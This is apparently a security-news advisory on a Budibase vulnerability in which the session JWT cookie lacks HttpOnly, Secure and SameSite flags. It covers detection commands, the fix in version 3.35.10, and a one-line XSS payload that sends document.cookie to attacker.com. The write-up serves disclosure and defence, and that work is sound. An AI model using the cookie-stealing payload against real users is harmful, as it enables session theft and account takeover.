Listen to this Post
CVE-2026-42239 resides in the cookie‑setting logic for Budibase’s session JWT.
In `packages/backend-core/src/utils/utils.ts:218`, the `budibase:auth` cookie is
hardcoded with httpOnly: false, allowing JavaScript to read the token via
document.cookie. The cookie also lacks the `Secure` flag (sent over plaintext
HTTP) and a `SameSite` attribute.
Attackers who already have an XSS vector – for example the stored XSS from
GHSA‑gp5x‑2v54‑v2q5 (unsanitized entity names) – can inject a script that
exfiltrates the JWT to a remote server. Because httpOnly: false,
`document.cookie` returns the full session token, turning any XSS into a full
account takeover. With the stolen JWT, the attacker gains persistent access
to the victim’s account without needing to re‑exploit the XSS each time.
The patch, released in version 3.35.10, changes the cookie flags to
httpOnly: true, adds Secure: true, and sets SameSite: 'lax'.
Until upgraded, the missing `httpOnly` flag leaves the session token exposed
to any client‑side script execution.
DailyCVE Form:
Platform: Budibase
Version: <3.35.10
Vulnerability: Missing HttpOnly flag
Severity: High
date: 2026-05-07
Prediction: Upgrade to 3.35.10
What Undercode Say:
Check for missing HttpOnly flag on the budibase:auth cookie curl -s -I https://target-budibase.com 2>/dev/null | grep -i "set-cookie: budibase:auth" Grep for the vulnerable cookie configuration in the source code grep -r "httpOnly: false" packages/backend-core/src/utils/utils.ts
Exploit:
// Attacker’s XSS payload – steal the JWT and send it to a remote server new Image().src = 'https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie);
Protection:
Upgrade to Budibase version 3.35.10 or higher. If upgrading is not possible, manually override the cookie flags in the application configuration to enforce httpOnly: true, Secure: true, and SameSite: 'lax'.
Impact:
Full account takeover – any XSS vulnerability in the application leads to permanent compromise of the victim’s session.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
